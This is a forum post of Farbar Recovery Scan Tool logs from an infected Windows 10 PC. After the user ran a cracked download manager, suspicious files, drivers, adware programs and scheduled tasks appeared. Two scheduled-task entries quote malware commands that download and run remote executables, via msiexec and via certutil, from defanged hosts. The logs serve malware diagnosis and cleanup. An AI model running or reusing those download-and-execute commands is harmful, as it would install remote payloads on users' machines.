    2019-02-08 22:55 - 2015-06-17 18:10 - 001166520 _____ (Microsoft Corporation) C:\Windows\system32\PresentationNative_v0300.dll
    2019-02-08 22:55 - 2015-06-17 18:10 - 000124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
    2019-02-08 22:55 - 2015-06-17 18:10 - 000035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
    2019-02-08 22:55 - 2015-05-29 21:07 - 000778936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationNative_v0300.dll
    2019-02-08 22:55 - 2015-05-29 21:07 - 000102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
    2019-02-08 22:55 - 2015-05-29 21:07 - 000035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
    2019-02-08 22:46 - 2019-02-08 22:46 - 000000836 __RSH C:\ProgramData\ntuser.pol
    2019-02-08 22:28 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\fsmysd5hgd4
    2019-02-08 22:22 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\htpaossc1dy
    2019-02-08 22:22 - 2019-02-08 22:22 - 006161408 _____ C:\Users\Thomazing!\AppData\Local\dump007.dat
    2019-02-08 22:22 - 2019-02-08 22:22 - 000003704 _____ C:\Windows\System32\Tasks\iewiouoxxf
    2019-02-08 22:22 - 2019-02-08 22:22 - 000003486 _____ C:\Windows\System32\Tasks\hjuzju
    2019-02-08 22:22 - 2019-02-08 22:22 - 000000009 _____ C:\Users\Thomazing!\rstr3.ini
    2019-02-08 22:11 - 2019-02-09 01:02 - 000000004 _____ C:\ProgramData\lock.dat
    2019-02-08 22:11 - 2019-02-09 00:44 - 000000032 _____ C:\ProgramData\irw.atsd
    2019-02-08 22:11 - 2019-02-08 22:11 - 000000008 _____ C:\ProgramData\ts.dat
    2019-02-08 22:09 - 2019-02-08 22:09 - 000000000 ____D C:\ProgramData\localNETService
    2019-02-08 22:08 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\dwdqael1vpm
    2019-02-08 22:03 - 2019-02-08 22:03 - 000004138 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{166847B2-00F9-4170-B86A-AB179FF4BAF1}
    2019-02-08 22:03 - 2019-02-08 22:03 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Macromedia
    2019-02-08 22:00 - 2019-02-08 22:00 - 000004608 _____ C:\Windows\SECOH-QAD.exe
    2019-02-08 22:00 - 2019-02-08 22:00 - 000003584 _____ C:\Windows\SECOH-QAD.dll
    2019-02-08 21:58 - 2019-02-09 00:42 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\DMCache
    2019-02-08 21:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\p542dcem2lr
    2019-02-08 21:58 - 2019-02-08 23:05 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\IDM
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\Downloads\Video
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\Downloads\Compressed
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\ProgramData\IDM
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Program Files (x86)\Internet Download Manager
    2019-02-08 21:50 - 2019-02-08 23:06 - 000000000 ____D C:\Windows\SysWOW64\SSL
    2019-02-08 21:50 - 2019-02-08 23:01 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\WhiteClick
    2019-02-08 21:50 - 2019-02-08 21:50 - 001612288 _____ C:\Windows\bxetfbicyncsflqei.bxetf
    2019-02-08 21:49 - 2019-02-08 23:06 - 000000000 ____D C:\ProgramData\boost_interprocess
    2019-02-08 21:49 - 2019-02-08 21:52 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Opera Software
    2019-02-08 21:49 - 2019-02-08 21:49 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc
    2019-02-08 21:48 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\la5jchefohd
    2019-02-08 21:48 - 2019-02-08 21:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2019-02-08 21:47 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\znnxx0e21dn
    2019-02-08 21:47 - 2019-02-09 00:39 - 000000000 ____D C:\Program Files (x86)\DiskWMpower
    2019-02-08 21:47 - 2019-02-08 21:47 - 000003756 _____ C:\Windows\System32\Tasks\{793C8F45-2D37-6E42-38A1-4FC6F516C21B}
    2019-02-08 21:47 - 2019-02-08 21:47 - 000003626 _____ C:\Windows\System32\Tasks\{CCA8B79B-43C5-96CB-2514-85E1469B3E7C}
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000003 _____ C:\Users\Thomazing!\AppData\Local\wbem.ini
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Mozilla
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000000 ____D C:\Program Files (x86)\Multitimer
    2019-02-08 21:46 - 2019-02-09 00:43 - 000003612 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2019-02-08 21:46 - 2019-02-09 00:43 - 000003290 _____ C:\Windows\System32\Tasks\csrss
    2019-02-08 21:46 - 2019-02-09 00:39 - 000000000 ____D C:\Program Files (x86)\Cta
    2019-02-08 21:46 - 2019-02-08 23:16 - 000000000 ____D C:\Program Files (x86)\0qfoy55me3i
    2019-02-08 21:46 - 2019-02-08 21:48 - 008019296 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
    2019-02-08 21:46 - 2019-02-08 21:48 - 001123400 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
    2019-02-08 21:46 - 2019-02-08 21:46 - 001895384 _____ C:\Users\Thomazing!\AppData\Local\Namfresh.bin
    2019-02-08 21:46 - 2019-02-08 21:46 - 000621928 _____ (VxDriver) C:\Windows\B62CD2D3FFB1.sys
    2019-02-08 21:46 - 2019-02-08 21:46 - 000015602 _____ C:\Windows\SysWOW64\findit.xml
    2019-02-08 21:46 - 2019-02-08 21:46 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Opera Software
    2019-02-08 21:46 - 2019-02-08 21:46 - 000000000 ____D C:\ProgramData\Polygens
    2019-02-08 21:46 - 2019-02-08 21:46 - 000000000 ____D C:\ProgramData\Logic Cramble
    2019-02-08 21:45 - 2019-02-08 23:05 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\uTorrent
    2019-02-08 21:45 - 2019-02-08 21:52 - 000722944 _____ C:\Users\Thomazing!\AppData\Local\sham.db
    2019-02-08 21:45 - 2019-02-08 21:45 - 007881728 _____ C:\Users\Thomazing!\AppData\Local\agent.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 002038046 _____ C:\Users\Thomazing!\AppData\Local\Silsoning.tst
    2019-02-08 21:45 - 2019-02-08 21:45 - 001632256 _____ (TODO: <Company name>) C:\Users\Thomazing!\AppData\Local\Silsoning.exe
    2019-02-08 21:45 - 2019-02-08 21:45 - 001632256 _____ (TODO: <Company name>) C:\Users\Thomazing!\AppData\Local\Joybam.exe
    2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000278510 _____ C:\Users\Thomazing!\AppData\Local\Joybam.tst
    2019-02-08 21:45 - 2019-02-08 21:45 - 000140800 _____ C:\Users\Thomazing!\AppData\Local\installer.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000126464 _____ C:\Users\Thomazing!\AppData\Local\noah.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000070896 _____ C:\Users\Thomazing!\AppData\Local\Config.xml
    2019-02-08 21:45 - 2019-02-08 21:45 - 000053888 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\TVALZ_O.SYS
    2019-02-08 21:45 - 2019-02-08 21:45 - 000045720 _____ (Toshiba Corporation) C:\Windows\system32\Drivers\Thotkey.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000044208 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\tosrfec.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000035584 _____ (Western Digital Technologies, Inc.) C:\Windows\system32\Drivers\wdcsam64.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000018432 _____ C:\Users\Thomazing!\AppData\Local\Main.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000017920 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\FwLnk.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000016368 _____ C:\Users\Thomazing!\AppData\Local\InstallationConfiguration.xml
    2019-02-08 21:45 - 2019-02-08 21:45 - 000005568 _____ C:\Users\Thomazing!\AppData\Local\md.xml
    2019-02-08 21:45 - 2019-02-08 21:45 - 000003088 _____ C:\Windows\System32\Tasks\Synaptics TouchPad Enhancements
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000881 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files\Synaptics
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files (x86)\foldershare
    2019-02-08 21:44 - 2019-02-08 21:45 - 000000000 ____D C:\ProgramData\VMR6PC5JA6GYC9V0XH3B
    2019-02-08 21:44 - 2019-02-08 21:44 - 001795952 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01011.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000722672 _____ (Synaptics Incorporated) C:\Windows\system32\SynCOM.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000528112 _____ (Synaptics Incorporated) C:\Windows\system32\Drivers\SynTP.sys
    2019-02-08 21:44 - 2019-02-08 21:44 - 000422128 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPCo19.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000400112 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynCom.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000251632 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPAPI.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000169712 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynTPCom.dll
    2019-02-08 21:42 - 2019-02-08 21:42 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\WinRAR
    2019-02-08 21:42 - 2019-02-08 21:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
    2019-02-08 21:41 - 2019-02-08 21:41 - 003141232 _____ (Alexander Roshal) C:\Users\Thomazing!\Downloads\winrar-x64-57b1.exe
    2019-02-08 21:41 - 2019-02-08 21:41 - 000000000 ____D C:\Program Files\WinRAR
    2019-02-08 21:41 - 2019-02-08 21:41 - 000000000 ____D C:\Program Files\VideoLAN
    2019-02-08 21:37 - 2019-02-08 21:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
    2019-02-08 21:35 - 2019-02-08 21:35 - 010627744 _____ (Intel Corporation) C:\Windows\system32\Drivers\igdkmd64.sys
    2019-02-08 21:35 - 2019-02-08 21:35 - 006593816 _____ (Intel Corporation) C:\Windows\system32\igdumd64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 004931384 _____ (Intel Corporation) C:\Windows\SysWOW64\igdumd32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 004755784 _____ (Intel Corporation) C:\Windows\system32\igd10umd64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 004370016 _____ (Intel Corporation) C:\Windows\SysWOW64\igd10umd32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 001991936 _____ C:\Windows\system32\iglhxa64.cpa
    2019-02-08 21:35 - 2019-02-08 21:35 - 000982240 _____ C:\Windows\SysWOW64\igkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000982240 _____ C:\Windows\system32\igkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000439308 _____ C:\Windows\SysWOW64\igcompkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000439308 _____ C:\Windows\system32\igcompkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000208896 _____ (Intel Corporation) C:\Windows\SysWOW64\iglhsip32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000206336 _____ (Intel Corporation) C:\Windows\system32\iglhsip64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000188416 _____ (Intel Corporation) C:\Windows\system32\iglhcp64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000147456 _____ (Intel Corporation) C:\Windows\SysWOW64\iglhcp32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000092356 _____ C:\Windows\SysWOW64\igfcg500m.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000092356 _____ C:\Windows\system32\igfcg500m.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000060254 _____ C:\Windows\system32\iglhxg64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000060226 _____ C:\Windows\system32\iglhxc64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000060015 _____ C:\Windows\system32\iglhxo64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000005424 _____ C:\Windows\system32\iglhxs64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000001090 _____ C:\Windows\system32\iglhxa64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000000000 ____D C:\Windows\PCHEALTH
    2019-02-08 21:34 - 2019-02-08 21:34 - 000000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform
    2019-02-08 21:33 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files\Microsoft Office
    2019-02-08 21:33 - 2019-02-08 21:35 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
    2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 __RHD C:\MSOCache
    2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Microsoft Help
    2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 ____D C:\Program Files (x86)\Microsoft Analysis Services
    2019-02-08 21:26 - 2019-02-08 23:17 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Google
    2019-02-08 21:26 - 2019-02-08 23:02 - 000000000 ____D C:\Program Files (x86)\Google
    2019-02-08 21:26 - 2019-02-08 21:26 - 001136176 _____ (Google Inc.) C:\Users\Thomazing!\Downloads\ChromeSetup.exe
    2019-02-08 21:24 - 2019-02-08 21:24 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\MicrosoftEdge
    2019-02-07 17:10 - 2019-02-07 17:10 - 000098203 _____ C:\Windows\uninstaller.dat

    ==================== One month (modified) ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2019-02-09 13:19 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\rescache
    2019-02-09 13:16 - 2015-07-10 17:47 - 000000000 ____D C:\Windows\system32\Sysprep
    2019-02-09 13:14 - 2015-07-31 06:42 - 000028672 _____ C:\Windows\system32\config\BCD-Template
    2019-02-09 00:52 - 2015-07-31 06:40 - 000000000 ____D C:\Windows\INF
    2019-02-09 00:43 - 2015-07-31 05:52 - 000000006 ____H C:\Windows\Tasks\SA.DAT
    2019-02-09 00:42 - 2015-07-10 17:05 - 000131072 ___SH C:\Windows\system32\config\BBI
    2019-02-08 23:59 - 2015-09-10 13:44 - 000000000 __RHD C:\Users\Public\AccountPictures
    2019-02-08 22:56 - 2015-07-31 06:25 - 000000000 ____D C:\Windows\CbsTemp
    2019-02-08 22:45 - 2015-07-31 06:42 - 000000000 ___HD C:\Windows\system32\GroupPolicy
    2019-02-08 22:08 - 2015-07-31 05:49 - 000277768 _____ C:\Windows\system32\FNTCACHE.DAT
    2019-02-08 21:46 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\AppReadiness
    2019-02-08 21:39 - 2015-07-31 06:42 - 000000000 ___HD C:\Program Files\WindowsApps
    2019-02-08 21:34 - 2015-07-31 06:42 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
    2019-02-08 21:33 - 2015-09-10 13:21 - 000000000 ____D C:\Windows\ShellNew

    ==================== Files in the root of some directories =======

    2019-02-08 22:11 - 2019-02-09 01:02 - 000000004 _____ () C:\ProgramData\lock.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
    2019-02-08 22:11 - 2019-02-08 22:11 - 000000008 _____ () C:\ProgramData\ts.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
    1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Program Files (x86)\iUOI.exe
    1601-01-03 21:26 - 1601-01-03 21:26 - 000180736 ____N (Microsoft Corporation) C:\Program Files (x86)\OKseaoP.exe
    2019-02-08 21:45 - 2019-02-08 21:45 - 007881728 _____ () C:\Users\Thomazing!\AppData\Local\agent.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000070896 _____ () C:\Users\Thomazing!\AppData\Local\Config.xml
    2019-02-08 22:22 - 2019-02-08 22:22 - 006161408 _____ () C:\Users\Thomazing!\AppData\Local\dump007.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000016368 _____ () C:\Users\Thomazing!\AppData\Local\InstallationConfiguration.xml
    2019-02-08 21:45 - 2019-02-08 21:45 - 000140800 _____ () C:\Users\Thomazing!\AppData\Local\installer.dat
    1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\IOIiIOa.exe
    2019-02-08 21:45 - 2019-02-08 21:45 - 001632256 _____ (TODO: <Company name>) C:\Users\Thomazing!\AppData\Local\Joybam.exe
    2019-02-08 21:45 - 2019-02-08 21:45 - 000278510 _____ () C:\Users\Thomazing!\AppData\Local\Joybam.tst
    2019-02-08 21:45 - 2019-02-08 21:45 - 000018432 _____ () C:\Users\Thomazing!\AppData\Local\Main.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000005568 _____ () C:\Users\Thomazing!\AppData\Local\md.xml
    2019-02-08 21:46 - 2019-02-08 21:46 - 001895384 _____ () C:\Users\Thomazing!\AppData\Local\Namfresh.bin
    2019-02-08 21:45 - 2019-02-08 21:45 - 000126464 _____ () C:\Users\Thomazing!\AppData\Local\noah.dat
    2019-02-08 21:45 - 2019-02-08 21:52 - 000722944 _____ () C:\Users\Thomazing!\AppData\Local\sham.db
    2019-02-08 21:45 - 2019-02-08 21:45 - 001632256 _____ (TODO: <Company name>) C:\Users\Thomazing!\AppData\Local\Silsoning.exe
    2019-02-08 21:45 - 2019-02-08 21:45 - 002038046 _____ () C:\Users\Thomazing!\AppData\Local\Silsoning.tst
    2019-02-08 21:46 - 2019-02-08 21:46 - 000032038 _____ () C:\Users\Thomazing!\AppData\Local\uninstall_temp.ico
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000003 _____ () C:\Users\Thomazing!\AppData\Local\wbem.ini

    Files to move or delete:
    ====================
    C:\Program Files (x86)\Multitimer\Multitimer.exe
    C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe
    C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe


    Some files in TEMP:
    ====================
    2019-02-08 21:46 - 2019-02-08 21:46 - 001527488 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\dbghelp.dll
    2019-02-08 21:44 - 2019-02-08 21:47 - 025260414 _____ (TigerTrade ) C:\Users\Thomazing!\AppData\Local\Temp\ezdyyd.exe
    2019-02-08 21:45 - 2019-02-08 21:46 - 000672090 _____ (FAZ ) C:\Users\Thomazing!\AppData\Local\Temp\global_installer.exe
    2019-02-08 21:44 - 2019-02-08 21:55 - 002892544 _____ (BitTorrent Inc.) C:\Users\Thomazing!\AppData\Local\Temp\IDM_Serial_Number_Crack_Patch_Free_2019_Serial_Keys.exe
    2019-02-08 22:22 - 2019-02-09 00:31 - 000000000 ____D () C:\Users\Thomazing!\AppData\Local\Temp\ImagingEngine.dll
    2019-02-08 21:46 - 2019-02-08 21:46 - 001385984 _____ (wj32) C:\Users\Thomazing!\AppData\Local\Temp\installer_mi.exe
    2019-02-08 21:46 - 2019-02-08 21:48 - 001905784 _____ (Google Inc.) C:\Users\Thomazing!\AppData\Local\Temp\mcasin.exe
    2019-02-08 21:46 - 2019-02-08 21:46 - 000375522 _____ ( ) C:\Users\Thomazing!\AppData\Local\Temp\ncyvgt4vxoc.exe
    2019-02-08 21:46 - 2019-02-08 21:46 - 000167616 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\symsrv.dll
    2019-02-08 21:51 - 2019-02-08 21:47 - 000099906 _____ () C:\Users\Thomazing!\AppData\Local\Temp\Uninstall.exe
    2019-02-08 21:44 - 2019-02-08 21:45 - 004500992 _____ () C:\Users\Thomazing!\AppData\Local\Temp\xtex.exe

    ==================== Bamital & volsnap ======================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\system32\winlogon.exe => File is digitally signed
    C:\Windows\system32\wininit.exe => File is digitally signed
    C:\Windows\explorer.exe => File is digitally signed
    C:\Windows\SysWOW64\explorer.exe => File is digitally signed
    C:\Windows\system32\svchost.exe => File is digitally signed
    C:\Windows\SysWOW64\svchost.exe => File is digitally signed
    C:\Windows\system32\services.exe => File is digitally signed
    C:\Windows\system32\User32.dll => File is digitally signed
    C:\Windows\SysWOW64\User32.dll => File is digitally signed
    C:\Windows\system32\userinit.exe => File is digitally signed
    C:\Windows\SysWOW64\userinit.exe => File is digitally signed
    C:\Windows\system32\rpcss.dll => File is digitally signed
    C:\Windows\system32\dnsapi.dll => File is digitally signed
    C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
    C:\Windows\system32\dllhost.exe => File is digitally signed
    C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
    C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

    BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully

    LastRegBack: 2019-02-09 13:15

    ==================== End of FRST.txt ============================

  2. #2
    Join Date
    Jul 2008
    Posts
    232
    ADDITION


    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 6.02.2019
    Ran by Thomazing! (09-02-2019 01:03:19)
    Running from C:\Users\Thomazing!\Downloads
    Windows 10 Pro 10240.16487 (X64) (2019-02-09 05:18:42)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-3408261874-2140888000-2142219774-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-3408261874-2140888000-2142219774-503 - Limited - Disabled)
    Guest (S-1-5-21-3408261874-2140888000-2142219774-501 - Limited - Disabled)
    Thomazing! (S-1-5-21-3408261874-2140888000-2142219774-1001 - Administrator - Enabled) => C:\Users\Thomazing!

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    µTorrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
    Alien Team (HKLM-x32\...\{52811919-39BB-4C90-95A6-323FA6636B29}_is1) (Version: 1 - Alien Team)
    CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
    CloudNet (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
    DiskWMpower version 1.0 (HKLM-x32\...\DiskWMpower_is1) (Version: 1.0 - WeMonetize) <==== ATTENTION
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.96 - Google Inc.)
    Google Toolbar for Internet Explorer (HKLM-x32\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden
    Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
    Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
    IDM Crack 6.25 build 20 (HKLM-x32\...\IDM Crack 6.25 build 20) (Version: build 21 - Crackingpatching.com Team)
    Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
    Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.4763.1000 - Microsoft Corporation)
    Multitimer version 1.0 (HKLM-x32\...\Multitimer_is1) (Version: 1.0 - ) <==== ATTENTION
    Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.51 - Synaptics Incorporated)
    TotalAV (HKLM-x32\...\TotalAV) (Version: 4.10.38 - TotalAV)
    VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
    WinRAR 5.70 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.70.1 - win.rar GmbH)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc. -> Tonec Inc.)
    ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {25681BAB-9719-40FC-87F6-A290829EB501} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
    Task: {34F52A04-A693-4743-95C8-BD2D08D5B443} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2019-02-08] () [File not signed] <==== ATTENTION
    Task: {38519D9A-952D-4D91-9C1A-8C4F1933B519} - System32\Tasks\iewiouoxxf => "msiexec" /q -package hxxps://superdomain1709.info/qolsfioklpiu.huu
    Task: {43DBA25B-CE5F-49A9-898C-47539A2F79EE} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://krokas.info/app/app.exe C:\Users\Thomazing!\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Thomazing!\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    Task: {71E02E5A-83AD-4151-B826-04CEFE0C7B32} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
